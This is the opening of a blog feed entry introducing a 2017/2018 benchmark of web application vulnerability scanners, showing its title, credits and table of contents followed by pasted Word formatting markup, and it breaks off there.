<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-3792178847867987053</id><updated>2026-04-30T15:49:07.634-07:00</updated><category term="benchmark"/><category term="benchmarking"/><category term="web application scanner"/><category term="scanner"/><category term="security"/><category term="security tools"/><category term="vulnerability scanner"/><category term="ADoS"/><category term="Session Puzzling"/><category term="Temporal Session Race Conditions"/><category term="clarification"/><category term="conclusions"/><category term="followup"/><category term="sectoolmarket"/><category term="security benchmark"/><category term="the best web application vulnerability scanner"/><category term="vulnerable application"/><title type='text'>Security Tools Benchmarking</title><subtitle type='html'>Security Tools Benchmarking - A blog dedicated to aiding pen-testers in choosing tools that make a difference.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default?redirect=false'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>22</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-7339223271228712338</id><published>2017-11-10T05:59:00.001-08:00</published><updated>2018-01-31T07:31:14.489-08:00</updated><title type='text'>WAVSEP 2017/2018 - Evaluating DAST against PT/SDL Challenges</title><content type='html'>&lt;div style=&quot;margin: 0in 0in 0.0001pt; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 24pt;&quot;&gt;&lt;span style=&quot;color: #e06666;&quot;&gt;The 2017/2018 WAVSEP DAST Benchmark:&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin: 0in 0in 0.0001pt; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;margin: 0in 0in 0.0001pt; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 36pt;&quot;&gt;Evaluation of Web Application
Vulnerability Scanners in Modern Pentest/SSDLC Usage Scenarios&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;By &lt;a href=&quot;https://twitter.com/sectooladdict?lang=en&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: magenta;&quot;&gt;Shay Chen&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Information Security Analyst, Researcher, and Speaker&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;November 10th, 2017 / Updated 31/01/2018&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Assessment Environments: WAVSEP 1.7, WAVSEP-EXT, Various SPA Apps&lt;/b&gt;&lt;br /&gt;
Multiple content contributions by &lt;span style=&quot;color: purple;&quot;&gt;&lt;b&gt;Achiad Avivi&lt;/b&gt;&lt;/span&gt; and &lt;a href=&quot;https://twitter.com/pentagramz?lang=en&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: purple;&quot;&gt;&lt;b&gt;Blessen Thomas&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
Sponsored by:&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrNytJzf1oL2PMVUAgxqATdBJVe15LjRvK4BkCqinzzm3HnwLTMsBa0tD3YA4RKtZyNfVw69A0QIECwOHOI8dsrstdD6APMxdsmt5edN2OG9bwRzbNiujd-n4WNvWZwHap91uTBX_AEEU/s1600/EffectiveSecurityLogo001_1000pxWide.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;431&quot; data-original-width=&quot;1000&quot; height=&quot;137&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrNytJzf1oL2PMVUAgxqATdBJVe15LjRvK4BkCqinzzm3HnwLTMsBa0tD3YA4RKtZyNfVw69A0QIECwOHOI8dsrstdD6APMxdsmt5edN2OG9bwRzbNiujd-n4WNvWZwHap91uTBX_AEEU/s320/EffectiveSecurityLogo001_1000pxWide.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;Table of Content&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
1. Introduction&lt;br /&gt;
&lt;br /&gt;
2. Benchmark Overview&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 2.1 List of Tested Web Application Scanners&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 2.2 The Evaluation Criteria&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 2.3 The False Positive Aspect in Penetration-Tests / SSDLC&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 2.4 New Technologies Overview - Out of Band Security Testing - OAST&lt;br /&gt;
&lt;br /&gt;
3. Benchmark Results&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 3.1 Input Delivery Vector Support (Update)&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 3.2 Support for Overcoming Modern Scan Barriers (&lt;span style=&quot;color: cyan;&quot;&gt;&lt;b&gt;Altered&lt;/b&gt;&lt;/span&gt;)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 3.3 Support for Crucial SSDLC Integration Features (&lt;span style=&quot;color: yellow;&quot;&gt;&lt;b&gt;New!&lt;/b&gt;&lt;/span&gt;)&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 3.4 The Detection Ratio of OS Command Injection (&lt;span style=&quot;color: yellow;&quot;&gt;&lt;b&gt;New!&lt;/b&gt;&lt;/span&gt;)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 3.5 The Detection Ratio of Remote File Inclusion/SSRF (&lt;span style=&quot;color: cyan;&quot;&gt;&lt;b&gt;Altered&lt;/b&gt;&lt;/span&gt;)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 3.6 The Detection Ratio of Path Traversal (Update)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 3.7 The Detection Ratio of SQL Injection (Update)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 3.8 The Detection Ratio of Cross Site Scripting (Update)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 3.9 The Detection Ratio of Unvalidated Redirect (Update)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 3.10 The Detection Ratio of Backup/Hidden Files (Update)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:TrackMoves/&gt;
  &lt;w:TrackFormatting/&gt;
  &lt;w:PunctuationKerning/&gt;
  &lt;w:ValidateAgainstSchemas/&gt;
  &lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;
  &lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;
  &lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;
  &lt;w:DoNotPromoteQF/&gt;
  &lt;w:LidThemeOther&gt;EN-US&lt;/w:LidThemeOther&gt;
  &lt;w:LidThemeAsian&gt;X-NONE&lt;/w:LidThemeAsian&gt;
  &lt;w:LidThemeComplexScript&gt;HE&lt;/w:LidThemeComplexScript&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
   &lt;w:DontGrowAutofit/&gt;
   &lt;w:SplitPgBreakAndParaMark/&gt;
   &lt;w:EnableOpenTypeKerning/&gt;
   &lt;w:DontFlipMirrorIndents/&gt;
   &lt;w:OverrideTableStyleHps/&gt;
  &lt;/w:Compatibility&gt;
  &lt;m:mathPr&gt;
   &lt;m:mathFont m:val=&quot;Cambria Math&quot;/&gt;
   &lt;m:brkBin m:val=&quot;before&quot;/&gt;
   &lt;m:brkBinSub m:val=&quot;--&quot;/&gt;
   &lt;m:smallFrac m:val=&quot;off&quot;/&gt;
   &lt;m:dispDef/&gt;
   &lt;m:lMargin m:val=&quot;0&quot;/&gt;
   &lt;m:rMargin m:val=&quot;0&quot;/&gt;
   &lt;m:defJc m:val=&quot;centerGroup&quot;/&gt;
   &lt;m:wrapIndent m:val=&quot;1440&quot;/&gt;
   &lt;m:intLim m:val=&quot;subSup&quot;/&gt;
   &lt;m:naryLim m:val=&quot;undOvr&quot;/&gt;
  &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:LatentStyles DefLockedState=&quot;false&quot; DefUnhideWhenUsed=&quot;false&quot;
  DefSemiHidden=&quot;false&quot; DefQFormat=&quot;false&quot; DefPriority=&quot;99&quot;
  LatentStyleCount=&quot;375&quot;&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;0&quot; QFormat=&quot;true&quot; Name=&quot;Normal&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;heading 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;heading 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;heading 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;heading 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;heading 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;heading 7&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;heading 8&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;heading 9&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index 7&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index 8&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index 9&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;toc 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;toc 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;toc 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;toc 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;toc 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;toc 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;toc 7&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;toc 8&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;toc 9&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Normal Indent&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;footnote text&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;annotation text&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;header&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;footer&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index heading&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;35&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;caption&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;table of figures&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;envelope address&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;envelope return&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;footnote reference&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;annotation reference&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;line number&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;page number&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;endnote reference&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;endnote text&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;table of authorities&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;macro&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;toa heading&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Bullet&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Number&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Bullet 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Bullet 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Bullet 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Bullet 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Number 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Number 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Number 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Number 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;10&quot; QFormat=&quot;true&quot; Name=&quot;Title&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Closing&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Signature&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;1&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;Default Paragraph Font&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Body Text&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Body Text Indent&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Continue&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Continue 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Continue 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Continue 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Continue 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Message Header&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;11&quot; QFormat=&quot;true&quot; Name=&quot;Subtitle&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Salutation&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Date&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Body Text First Indent&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Body Text First Indent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Note Heading&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Body Text 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Body Text 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Body Text Indent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Body Text Indent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Block Text&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Hyperlink&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;FollowedHyperlink&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;22&quot; QFormat=&quot;true&quot; Name=&quot;Strong&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;20&quot; QFormat=&quot;true&quot; Name=&quot;Emphasis&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Document Map&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Plain Text&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;E-mail Signature&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Top of Form&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Bottom of Form&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Normal (Web)&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Acronym&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Address&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Cite&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Code&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Definition&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Keyboard&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Preformatted&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Sample&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Typewriter&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Variable&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Normal Table&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;annotation subject&quot;/&gt;
